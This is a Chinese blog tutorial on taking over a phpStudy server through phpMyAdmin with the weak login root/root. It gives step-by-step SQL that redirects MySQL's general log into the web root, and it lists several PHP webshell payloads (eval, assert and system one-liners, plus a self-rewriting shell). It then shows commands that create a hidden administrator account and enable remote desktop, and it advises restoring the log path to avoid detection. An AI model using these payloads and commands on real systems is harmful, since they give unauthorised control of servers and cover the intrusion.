关于phpstudy之phpmyadmin改日志路径写木马

有人用过phpstudy搭建环境吗?

今天来讲述如何从phpmyadmin弱口令到新建管理员用户登录对方设备的攻击过程。

如果你的登录密码是弱口令的话,这是很危险的,比如说root、root.

你的ip如果在公网上的话,即使你的密码改了,也有被爆破的风险。

利用phpmyadmin来写木马

前提:主要对是弱口令(用户:root 密码:root)开启phpadmin的

满足条件:

1.ip/phpmyadmin进入,以root、root登录

2.查看日志开关为off还是on

show variables like '%general_log%';

查看日志开关为off还是on

如果关,就打开

set global general_log = on;



保存一下日志的原始路径(便于之后恢复他的路径不被发觉)

C:\phpStudy\PHPTutorial\MySQL\data\USER-20181210FI.

查询并设置输出类型

show variables like 'log_output'; -- 看看日志输出类型 table或file

set global log_output='table'; -- 设置输出类型为 table

set global log_output='file'; -- 设置输出类型为file

log_output=’FILE’ 表示将日志存入文件,默认值是FILE 

log_output=’TABLE’表示将日志存入数据库,这样日志信息就会被写入到mysql.slow_log表中.

2.1 如果on 就开始改日志路径

set global general_log_file = "C:\\phpStudy\\PHPTutorial\\WWW\\abc.php";(根据原始日志路径去填写)

注意:\\ 一定是两个


改写成功开始传马

然后在查询框填写木马,先传一句话

select '<?php eval($_POST[xy]);?>'; 简单的

发现还有另一种JS(javascript)脚本风格的写法

<script language="PHP"> @eval($_POST["code"]); </script>

<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?>

不死马/

<?php fputs(fopen(“shell.php”,”w”),’<?php system($_GET['cmd']);?>’);?>

<?php fputs(fopen('test.php','w'),'<?php @system($_GET[test]);?>');?>

select '<?php eval($_POST[a]); ?>' into outfile '/var/www/html/1.php'

上传成功


蚁剑开始连接一句话



连接成功

开启虚拟终端 开始创建用户

net user win77 abc..123 /add 创建用户win77

用户 win77 密码 abc..123


将用户加入administrators组中,获取管理员权

net localgroup administrators win77 /add


net user win77 查看用户信息,假如用户也在users族中就用下面的命令给删除


net localgroup users wini77 /del 删除用户在users组

下面查看端口,用户有没有开启3389端口

netstat -an


没开就用命令打开3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1


看到回显成功了

接下来用自己的pc 去连接靶机

win+R 输入mstsc


输入win77的用户名 密码然后登陆

然后就连接成功了

下面是虚拟机测试成功地回答


举报
评论 0